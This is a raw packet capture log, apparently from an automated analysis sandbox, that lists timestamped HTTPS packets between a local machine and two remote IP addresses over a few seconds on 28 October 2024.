                                                                                                                                                                            Oct 28, 2024 19:12:51.812314034 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.817337990 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.817348003 CET44359210162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.822504997 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.953356028 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.953371048 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.953687906 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.953722000 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954088926 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954102993 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954231024 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954236984 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954433918 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954459906 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954488039 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954495907 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.954936981 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.954943895 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.952224016 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992366076 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992440939 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992481947 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992496967 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.992531061 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.992683887 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.992683887 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.992713928 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992741108 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.995590925 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.995635986 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.995699883 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.995853901 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.995870113 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052498102 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052609921 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052701950 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.052711964 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052748919 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052803993 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.052845001 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.052856922 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052865028 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.052869081 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.054963112 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.055003881 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.055154085 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.055277109 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.055305004 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.058768034 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.059422970 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.059478045 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.059545040 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.059554100 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.059571028 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.059575081 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.061541080 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.061556101 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.061605930 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.061738014 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.061748981 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.062177896 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.062328100 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.062429905 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.062453032 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.062457085 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.062467098 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.062469006 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.063805103 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064042091 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.064049959 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064331055 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.064357042 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064399004 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064428091 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.064621925 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.064646959 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064706087 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.064785957 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064850092 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.072483063 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.072779894 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.072789907 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.073236942 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.073508024 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.073586941 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.073599100 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.094171047 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.094260931 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.094295979 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.094306946 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.094353914 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.094480038 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.094480991 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.094513893 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.094532967 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.096539974 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.096551895 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.096612930 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.096736908 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.096749067 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.107326984 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.115329981 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.119369984 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.158107996 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.158313036 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.158324003 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.159490108 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.159836054 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.159934998 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.160011053 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.194840908 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.194892883 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.194937944 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.195096970 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.195102930 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.206023932 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.206091881 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.206199884 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.206278086 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.206290007 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.213120937 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.296798944 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.296945095 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.297161102 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.297400951 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.297405958 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.783253908 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.784212112 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.784240961 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.784761906 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.784765959 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.810820103 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.811471939 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.811486006 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.910023928 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.910147905 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.910172939 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.910191059 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.910204887 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.910211086 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.912431955 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.912475109 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.912554026 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.912678957 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.912695885 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922516108 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922563076 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922606945 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922657013 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.922692060 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.922708988 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922720909 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.922727108 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.924666882 CET59233443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.924693108 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.924870014 CET59233443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.925029993 CET59233443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.925040007 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.689893007 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.690287113 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.696261883 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.699129105 CET59230443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.699157953 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.699758053 CET59230443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.699763060 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.700088978 CET59229443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.700105906 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.700568914 CET59229443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.700573921 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.701092005 CET59231443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.701097965 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.702013969 CET59231443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.702018976 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.817148924 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.817970991 CET59233443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.817989111 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.818584919 CET59233443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.818593979 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.820111036 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.820561886 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.820611954 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.821324110 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.821336031 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.843297005 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.843334913 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.843386889 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.843518972 CET59230443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.844058990 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.844615936 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.846091986 CET59229443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.847002029 CET59230443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.847028017 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.847039938 CET59230443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.847044945 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.848917007 CET59229443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.848932028 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.848942995 CET59229443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.848948956 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.852515936 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.852740049 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.852875948 CET59231443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.852999926 CET59234443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.853055954 CET4435923413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.853209019 CET59234443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.853560925 CET59231443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.853569031 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.853576899 CET59231443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.853579998 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.857589960 CET59234443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.857620001 CET4435923413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.859524012 CET59235443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.859563112 CET4435923513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.861007929 CET59235443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.937824011 CET59236443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.937907934 CET4435923613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.937980890 CET59236443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.938290119 CET59235443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.938328028 CET4435923513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.942502022 CET59236443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.942540884 CET4435923613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.961755991 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.961827040 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.961921930 CET59233443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.962301016 CET59233443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.962318897 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.962332010 CET59233443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.962338924 CET4435923313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.982178926 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.982253075 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.982342005 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.982358932 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.986978054 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.998873949 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.998902082 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:56.998919964 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:56.998929024 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:57.019249916 CET59237443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:57.019282103 CET4435923713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:57.019359112 CET59237443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:57.027640104 CET59237443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:57.027659893 CET4435923713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:57.035661936 CET59238443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:57.035706043 CET4435923813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:57.035763979 CET59238443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:57.035893917 CET59238443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:57.035912991 CET4435923813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:57.622770071 CET4435923413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:57.623274088 CET59234443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:57.623307943 CET4435923413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:57.624021053 CET59234443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.824887991 CET59242443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.826524973 CET59243443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.826546907 CET4435924313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:58.826559067 CET59243443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.826565027 CET4435924313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:58.849009991 CET59242443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.849040031 CET4435924213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:58.849083900 CET59242443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.849092007 CET4435924213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:58.899740934 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.899791002 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:58.899856091 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.902254105 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.902282000 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:58.902344942 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.927228928 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.927258015 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:58.927444935 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:58.927465916 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.431121111 CET4435924413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.431629896 CET59244443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.431654930 CET4435924413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.432318926 CET59244443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.432323933 CET4435924413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.495673895 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.541327000 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.561332941 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.561357975 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.569401026 CET4435924413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.569818020 CET4435924413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.569896936 CET59244443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.581073046 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.581083059 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.591290951 CET59244443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.591310024 CET4435924413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.591326952 CET59244443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.591331959 CET4435924413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.597851038 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.600070000 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.600076914 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.604202986 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.604207039 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.620783091 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.620827913 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.620914936 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.621038914 CET59249443192.168.2.413.107.253.45
